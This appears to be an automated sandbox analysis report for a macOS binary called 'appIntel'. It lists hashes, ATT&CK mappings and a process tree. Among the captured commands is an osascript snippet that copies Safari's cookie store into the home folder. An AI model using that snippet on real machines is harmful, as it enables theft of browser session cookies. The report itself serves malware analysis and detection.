18e8f18fbf9e6c8798ee18bd88094478f8c4ba956415fd0b3e540f99547d6321

General

Target

appIntel
Size

1.5MB
MD5

24eb633aaec8eae75ae6f722923dc38b
SHA1

9dd3da391a4974b248d7966b8cee0b8bf8d2e2e2
SHA256

18e8f18fbf9e6c8798ee18bd88094478f8c4ba956415fd0b3e540f99547d6321
SHA512

23c6a58cea5e3779a7c0af4d5b44634e3f0366561dee04fb7cdbeff930df1eebd64a2f68578ce1f0d4e903eb52470925e62577978e2739a595646efc5113a8b5
SSDEEP

24576:0wudzeNUFYFjjNqmOi1j98CmR5mzxcbSj1z2CHN3d:0w/NU+Fjj8mOq8Cpxf1z2W3d

Score

4^/10

Malware Config

Signatures

AppleScript 1 TTPs 4 IoCs

AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.

execution

AppleScript

T1059.002

ioc	Process
osascript -e " on run set userTmpDir to (POSIX path of (path to home folder)) & \"Library/Caches/TemporaryItems/\" set newFolderName to \"ExampleFolder\" set newFolderPath to userTmpDir & newFolderName & \"/\" -- Create a new folder do shell script \"mkdir -p \" & quoted form of newFolderPath -- Create an example file to copy set exampleFileName to \"example.txt\" set exampleFilePath to userTmpDir & exampleFileName do shell script \"echo 'This is an example file.' > \" & quoted form of exampleFilePath -- Copy the example file to the new folder set newFilePath to newFolderPath & exampleFileName do shell script \"cp \" & quoted form of exampleFilePath & \" \" & quoted form of newFilePath end run "	Process not Found
osascript -e " set destinationFolderPath to ((path to home folder as text)) tell application \"Finder\" try set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try end try end tell "	Process not Found
osascript -e " on run set userTmpDir to (POSIX path of (path to home folder)) & \"Library/Caches/TemporaryItems/\" set newFolderName to \"ExampleFolder\" set newFolderPath to userTmpDir & newFolderName & \"/\" -- Create a new folder do shell script \"mkdir -p \" & quoted form of newFolderPath -- Create an example file to copy set exampleFileName to \"example.txt\" set exampleFilePath to userTmpDir & exampleFileName do shell script \"echo 'This is an example file.' > \" & quoted form of exampleFilePath -- Copy the example file to the new folder set newFilePath to newFolderPath & exampleFileName do shell script \"cp \" & quoted form of exampleFilePath & \" \" & quoted form of newFilePath end run "	Process not Found
osascript -e " set destinationFolderPath to ((path to home folder as text)) tell application \"Finder\" try set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try end try end tell "	Process not Found

Resource Forking 1 TTPs 2 IoCs

Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

evasion

Resource Forking

T1564.009

ioc	Process
/System/Library/CoreServices/loginwindow.app/Contents/Resources/LWWeeklyMessageTracer	Process not Found
"/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Resources/Java Updater.app/Contents/MacOS/Java Updater" -bgcheck	Process not Found

/usr/libexec/xpcproxy
xpcproxy com.apple.pluginkit.pkreporter
1⤵
PID:482

/usr/libexec/xpcproxy
xpcproxy com.apple.gkreport
1⤵
PID:483

/usr/bin/xar
/usr/bin/xar -c -f dslocal-backup.xar dslocal
1⤵
PID:481

/bin/sh
sh -c "sudo /bin/zsh -c \"/Users/run/appIntel\""
1⤵
PID:484

/usr/libexec/gkreport
/usr/libexec/gkreport
1⤵
PID:483

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/appIntel\""
1⤵
PID:484

/usr/libexec/xpcproxy
xpcproxy com.apple.systemstats.daily
1⤵
PID:485

/usr/libexec/xpcproxy
xpcproxy com.apple.loginwindow.LWWeeklyMessageTracer
1⤵
PID:486

/usr/libexec/xpcproxy
xpcproxy com.apple.newsyslog
1⤵
PID:487

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/appIntel
1⤵
PID:484
- /bin/zsh
  /bin/zsh -c /Users/run/appIntel
  2⤵
  PID:491
- /Users/run/appIntel
  /Users/run/appIntel
  2⤵
  PID:491
- - /usr/bin/osascript
    osascript -e " on run set userTmpDir to (POSIX path of (path to home folder)) & \"Library/Caches/TemporaryItems/\" set newFolderName to \"ExampleFolder\" set newFolderPath to userTmpDir & newFolderName & \"/\" -- Create a new folder do shell script \"mkdir -p \" & quoted form of newFolderPath -- Create an example file to copy set exampleFileName to \"example.txt\" set exampleFilePath to userTmpDir & exampleFileName do shell script \"echo 'This is an example file.' > \" & quoted form of exampleFilePath -- Copy the example file to the new folder set newFilePath to newFolderPath & exampleFileName do shell script \"cp \" & quoted form of exampleFilePath & \" \" & quoted form of newFilePath end run "
    3⤵
    PID:492
- - /usr/bin/osascript
    osascript -e " set destinationFolderPath to ((path to home folder as text)) tell application \"Finder\" try set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try end try end tell "
    3⤵
    PID:497

/usr/libexec/xpcproxy
xpcproxy com.oracle.java.Java-Updater
1⤵
PID:488

/System/Library/PrivateFrameworks/SpeechObjects.framework/Versions/A/SpeechDataInstallerd.app/Contents/MacOS/SpeechDataInstallerd
/System/Library/PrivateFrameworks/SpeechObjects.framework/Versions/A/SpeechDataInstallerd.app/Contents/MacOS/SpeechDataInstallerd
1⤵
PID:479

/usr/libexec/pkreporter
/usr/libexec/pkreporter
1⤵
PID:482

/System/Library/CoreServices/Applications/Feedback Assistant.app/Contents/Library/LaunchServices/seedusaged
"/System/Library/CoreServices/Applications/Feedback Assistant.app/Contents/Library/LaunchServices/seedusaged"
1⤵
PID:476

/System/Library/CoreServices/loginwindow.app/Contents/Resources/LWWeeklyMessageTracer
/System/Library/CoreServices/loginwindow.app/Contents/Resources/LWWeeklyMessageTracer
1⤵
PID:486

/usr/sbin/newsyslog
/usr/sbin/newsyslog
1⤵
PID:487

/bin/sh
sh -c "mkdir -p '/private/var/root/Library/Caches/TemporaryItems/ExampleFolder/'"
1⤵
PID:494

/bin/bash
sh -c "mkdir -p '/private/var/root/Library/Caches/TemporaryItems/ExampleFolder/'"
1⤵
PID:494

/bin/mkdir
mkdir -p /private/var/root/Library/Caches/TemporaryItems/ExampleFolder/
1⤵
PID:494

/bin/sh
sh -c "echo 'This is an example file.' > '/private/var/root/Library/Caches/TemporaryItems/example.txt'"
1⤵
PID:495

/bin/bash
sh -c "echo 'This is an example file.' > '/private/var/root/Library/Caches/TemporaryItems/example.txt'"
1⤵
PID:495

/bin/sh
sh -c "cp '/private/var/root/Library/Caches/TemporaryItems/example.txt' '/private/var/root/Library/Caches/TemporaryItems/ExampleFolder/example.txt'"
1⤵
PID:496

/bin/bash
sh -c "cp '/private/var/root/Library/Caches/TemporaryItems/example.txt' '/private/var/root/Library/Caches/TemporaryItems/ExampleFolder/example.txt'"
1⤵
PID:496

/bin/cp
cp /private/var/root/Library/Caches/TemporaryItems/example.txt /private/var/root/Library/Caches/TemporaryItems/ExampleFolder/example.txt
1⤵
PID:496

/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Resources/Java Updater.app/Contents/MacOS/Java Updater
"/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Resources/Java Updater.app/Contents/MacOS/Java Updater" -bgcheck
1⤵
PID:488

/usr/libexec/xpcproxy
xpcproxy com.apple.sysmond
1⤵
PID:506

/usr/libexec/sysmond
/usr/libexec/sysmond
1⤵
PID:506

/usr/libexec/xpcproxy
xpcproxy com.apple.audio.AudioComponentRegistrar
1⤵
PID:522

/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar
/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon
1⤵
PID:522

/usr/libexec/xpcproxy
xpcproxy com.apple.Terminal.2100
1⤵
PID:528

/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
1⤵
PID:528
- /usr/bin/login
  login -pf run
  2⤵
  PID:529
- - /bin/zsh
    -zsh
    3⤵
    PID:530
  - - /usr/libexec/path_helper
      /usr/libexec/path_helper -s
      4⤵
      PID:531
  - - /usr/bin/locale
      locale LC_CTYPE
      4⤵
      PID:532
  - - /bin/ls
      ls
      4⤵
      PID:534
  - - ./appIntel
      ./appIntel
      4⤵
      PID:543
    - - /usr/bin/osascript
        
        osascript -e " on run set userTmpDir to (POSIX path of (path to home folder)) & \"Library/Caches/TemporaryItems/\" set newFolderName to \"ExampleFolder\" set newFolderPath to userTmpDir & newFolderName & \"/\" -- Create a new folder do shell script \"mkdir -p \" & quoted form of newFolderPath -- Create an example file to copy set exampleFileName to \"example.txt\" set exampleFilePath to userTmpDir & exampleFileName do shell script \"echo 'This is an example file.' > \" & quoted form of exampleFilePath -- Copy the example file to the new folder set newFilePath to newFolderPath & exampleFileName do shell script \"cp \" & quoted form of exampleFilePath & \" \" & quoted form of newFilePath end run "
        5⤵
        
        PID:545
    - - /usr/bin/osascript
        
        osascript -e " set destinationFolderPath to ((path to home folder as text)) tell application \"Finder\" try set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try end try end tell "
        5⤵
        
        PID:550

/bin/launchctl
/bin/launchctl kill SIGTERM system/com.microsoft.OneDriveUpdaterDaemon
1⤵
PID:535

/bin/launchctl
/bin/launchctl kill SIGTERM system/com.microsoft.OneDriveStandaloneUpdaterDaemon
1⤵
PID:536

/bin/sh
sh -c "mkdir -p '/Users/run/Library/Caches/TemporaryItems/ExampleFolder/'"
1⤵
PID:547

/bin/bash
sh -c "mkdir -p '/Users/run/Library/Caches/TemporaryItems/ExampleFolder/'"
1⤵
PID:547

/bin/mkdir
mkdir -p /Users/run/Library/Caches/TemporaryItems/ExampleFolder/
1⤵
PID:547

/bin/sh
sh -c "echo 'This is an example file.' > '/Users/run/Library/Caches/TemporaryItems/example.txt'"
1⤵
PID:548

/bin/bash
sh -c "echo 'This is an example file.' > '/Users/run/Library/Caches/TemporaryItems/example.txt'"
1⤵
PID:548

/bin/sh
sh -c "cp '/Users/run/Library/Caches/TemporaryItems/example.txt' '/Users/run/Library/Caches/TemporaryItems/ExampleFolder/example.txt'"
1⤵
PID:549

/bin/bash
sh -c "cp '/Users/run/Library/Caches/TemporaryItems/example.txt' '/Users/run/Library/Caches/TemporaryItems/ExampleFolder/example.txt'"
1⤵
PID:549

/bin/cp
cp /Users/run/Library/Caches/TemporaryItems/example.txt /Users/run/Library/Caches/TemporaryItems/ExampleFolder/example.txt
1⤵
PID:549

/usr/libexec/xpcproxy
xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E
1⤵
PID:553

/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
1⤵
PID:553

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

AppleScript

1

T1059.002

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

1

T1564

Resource Forking

1

T1564.009

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/private/var/root/Library/Caches/TemporaryItems/example.txt

Filesize
25B

MD5
f83e4efb2befe7a99a475faa9374bf26

SHA1
107515b930226d6c4a49966689811ca83f2e40a5

SHA256
3decc07e5f05ad339fa35c936313dbd8e8bfe910c1c8dea9304102103d27916a

SHA512
ca101f8dc46666a2e204080421708dc55eaa712b1e30d3b98298e587b55a29b890c8ffb972e2e647cedc0e1e94855eaf9cf1e4a71cd4850dffdadb925b4f2d0c

Download Submit

Analysis

Sharing